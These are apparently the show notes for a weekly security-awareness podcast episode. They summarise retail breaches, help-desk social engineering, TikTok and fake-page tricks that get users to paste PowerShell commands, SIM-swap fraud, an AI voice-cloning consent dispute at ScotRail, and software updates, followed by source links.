What do Victoria’s Secret, TikTok, and a Scottish train station have in common?
They all feature in this week’s episode—alongside malware, fake IT calls, and a growing pile of breached data.
Episode 31 is full of weird, worrying, and very real cyber stories. Retailers are still getting hit. TikTok is spreading malware using AI-generated videos. SIM swap attacks are back. And a voice actor says her voice was cloned by ScotRail without permission. There's also a bit of good news—Microsoft and Apple are making some smart software updates that might actually help.
Let’s break it all down…
🛍️ Victoria’s Secret and Adidas – Different Attacks, Same Worry
Victoria’s Secret pulled down its entire US website after a security incident. Stores are still open, and the UK site is fine, but details are scarce. Meanwhile, Adidas confirmed that customer contact info was stolen via a third-party help desk. No credit cards were taken, but attackers now have names and email addresses—perfect for phishing.
The bigger trend? Help desks being socially engineered to reset passwords or provide access. It’s the same pattern we saw with MGM, M&S, and others. Social engineering is winning because it’s fast and it works. You don’t need zero-days when you can just ask someone nicely.
🎣 AI-Generated TikToks Are Now Spreading Malware
In a particularly grim twist, we found out this week that attackers are using TikTok to distribute info-stealing malware. The videos show fake software tips like “activate Microsoft Office” or “get Spotify Premium for free”—but they’re actually convincing users to open PowerShell and paste in malicious code.
One of these videos racked up half a million views.
This isn’t phishing in the traditional sense. There’s no dodgy link or email. Just a fake video and a bit of social engineering that hits people’s curiosity and FOMO. It’s especially dangerous on BYOD devices—because what gets installed at home could end up back on the corporate network.
📞 Google Meet Scam – Same Trick, New Platform
We also spotted a fake Google Meet error message asking users to “fix” their microphone by pressing Win+R and pasting in a command. It looks like Google Meet, but it’s a full clone, and the code gets copied to the clipboard automatically. You barely have to think. Just press, paste, and enter. And just like that, someone else has control of your device.
Same goes for fake Cloudflare verifications targeting WordPress admins and even a Coursera-themed phishing campaign that leads to a fake Facebook login page. It's all part of a wider trend: fewer links, more human behaviour tricks.
The lesson? If a webpage tells you to open PowerShell or press Win+R, don’t do it. Ever.
🔄 SIM Swap Scams Are Back (And Still Working)
This story came in from a listener—Oli spotted that someone he knows had been SIM swapped. They got a legitimate-looking message from EE confirming a new eSIM had been ordered, then a flurry of calls from an unknown number. They called EE, and yep—it had happened. Their mobile number had been reassigned, and SMS-based logins were no longer theirs.
It’s easy to forget just how much is tied to your phone number. SMS codes. Banking apps. Password resets. All it takes is one help desk that doesn’t ask the right questions. We talk about whether mobile providers should let users lock their SIM from porting—and why EE’s current process is nowhere near good enough.
🧠 The Awareness Angle – Tell People What’s Not Normal
This week’s awareness messaging is simple:
If a website or video asks you to open Run (Win+R), PowerShell, or paste in a command—walk away. It’s not normal. It’s never okay. Your IT team will never ask you to do this.
The same goes for weird login pages, especially if they’re offering something free, urgent, or exclusive. Encourage your users to pause and check before entering credentials or following instructions.
🎙️ ScotRail Voice Controversy – AI and Consent
Voice actor Gayanne Potter recorded some lines for accessibility tools back in 2021. This year, she discovered her voice had been turned into “Iona”—the new voice of ScotRail. She never gave permission for that. She’s spent two years trying to get it removed.
It’s a real-world version of the video we made last year—Likeness. It’s about how easily your identity can be used by an AI system once you've signed the wrong contract or clicked "agree" without reading. There’s currently no legal protection in the UK for voice or likeness. GDPR might not even apply if the company owns the original recordings.
This one’s a wake-up call for anyone working with audio, video, or their face and name online. Creators deserve more protection. And organisations using AI need to be upfront about how and why they’re doing it.
💰 Would You Sell Your Data for £40 a Month? Gen Z Might.
A new app called Verb.AI is paying Gen Zers $50 a month to track their scrolling, clicking, and buying. It builds a “digital twin” that companies can query like a chatbot to understand habits and preferences. It’s being sold as a fair value exchange. But is it?
Apparently, 88% of Gen Z are okay with sharing personal data if there’s compensation. And yet they’re also more likely than older generations to use encrypted messaging, block cookies, and browse privately. There's a tension here between knowing the risks and doing it anyway. And it’s something awareness teams need to understand.
The takeaway? Awareness isn’t just about teaching risk—it’s about helping people care. Especially when short-term rewards (like £40 a month) seem more tangible than long-term data consequences.
🔄 Smaller Bits Worth Your Time
-
WhatsApp is now offering passkey support for login—so you can ditch SMS codes and use fingerprint or face unlock instead.
-
Microsoft is building a new update orchestrator that will automatically patch all your drivers, apps, and system components in one go.
-
Apple’s switching to year-based naming for their OS updates—iOS 26, macOS 26, and so on—alongside a full redesign coming at WWDC.
🧠 The Awareness Angle – This Week’s Takeaways
Don’t Run Commands from Random Websites
That might sound obvious to security folks, but if TikTok videos and fake error messages are convincing thousands of people to paste code into PowerShell, we’ve still got work to do.
Tell Better Help Desk Stories
Attackers are getting in by calling IT. Seriously. The same way someone could walk into McDonald’s wearing a uniform and say “I work here now.” Teach your people to question unexpected requests, even from inside.
People Care About People, Not Protocols
£300 million lost. A cloned voice. A password on a post-it note. These are the kinds of details that stick. So make sure your awareness stories are human—not just technical.
🎙️ Quick Plugs
We’re up for Best Newcomer and Back to Basics at the European Cybersecurity Blogger Awards 2025. Results announced Wednesday 5th June at InfoSec Europe. Ant will be there—say hi if you’re around!
Don’t Miss It!
Our Awareness Angle Interview with Sara Carty from Unboring is out on Thursday.
It’s full of honest chat about drama school, storytelling, cyber marketing, and why we need to ditch blue, padlocks, and hoodie stock images.
Listen back—this one’s got loads for awareness pros.
📉 Victoria’s Secret Breach
Watch – https://youtu.be/XgogrdK_NvU?t=149
Read – https://www.bbc.co.uk/news/business-69081682
👟 Adidas Helpdesk Cyber Attack
Watch – https://youtu.be/XgogrdK_NvU?t=190
Read – https://www.bbc.co.uk/news/technology-69073785
📹 TikTok Malware via PowerShell Commands
Watch – https://youtu.be/XgogrdK_NvU?t=384
Read – https://www.infosecurity-magazine.com/news/ai-tiktok-infostealer-malware/
🪟 Microsoft’s Unified Update System
Watch – https://youtu.be/XgogrdK_NvU?t=523
Read – https://www.windowscentral.com/software-apps/windows-11/microsoft-is-working-on-a-unified-update-platform-to-keep-your-pc-up-to-date
🍎 Apple OS Rename: iOS 26 and macOS 26
Watch – https://youtu.be/XgogrdK_NvU?t=723
Read – https://9to5mac.com/2025/05/28/ios-26-name-change/
📄 Tajikistan Targeted via Word Macros
Watch – https://youtu.be/XgogrdK_NvU?t=847
Read – https://www.bleepingcomputer.com/news/security/russia-aligned-tag-110-targets-tajikistan-with-dotm-files/
☁️ Fake Cloudflare Verification Scam
Watch – https://youtu.be/XgogrdK_NvU?t=996
Read – https://www.wordfence.com/blog/2025/05/fake-cloudflare-page-malware/
🎥 Fake Google Meet PowerShell Attack
Watch – https://youtu.be/XgogrdK_NvU?t=1080
Read – https://www.cyware.com/news/new-phishing-scam-fake-google-meet-page-tricks-users-into-running-malware-67df4f27
🎓 Coursera/Meta Phishing Scam
Watch – https://youtu.be/XgogrdK_NvU?t=1214
Read – https://cofense.com/blog/fake-meta-certificates-coursera-phishing-campaign/
📱 SIM Swap Attack on EE
Watch – https://youtu.be/XgogrdK_NvU?t=2490
Read – https://community.ee.co.uk/t5/Mobile-Services/SIM-Swap-Scam-warning/m-p/1317527
💵 Gen Z Selling Their Data for $50/month
Watch – https://youtu.be/XgogrdK_NvU?t=2880
Read – https://www.fastcompany.com/91134124/gen-z-selling-personal-data-verb-app
🎙️ ScotRail AI Voice Controversy
Watch – https://youtu.be/XgogrdK_NvU?t=3133
Read – https://www.bbc.co.uk/news/uk-scotland-69085678
📜 T&Cs Tool – TOSDR.org
Watch – https://youtu.be/XgogrdK_NvU?t=3505
Read – https://tosdr.org/
🔐 WhatsApp Adds Passkey Support
Watch – https://youtu.be/XgogrdK_NvU?t=3660
Read – https://www.whatsapp.com/blog/passkeys-on-android
📧 Phishing Email Spoofing Luke
Watch – https://youtu.be/XgogrdK_NvU?t=3773
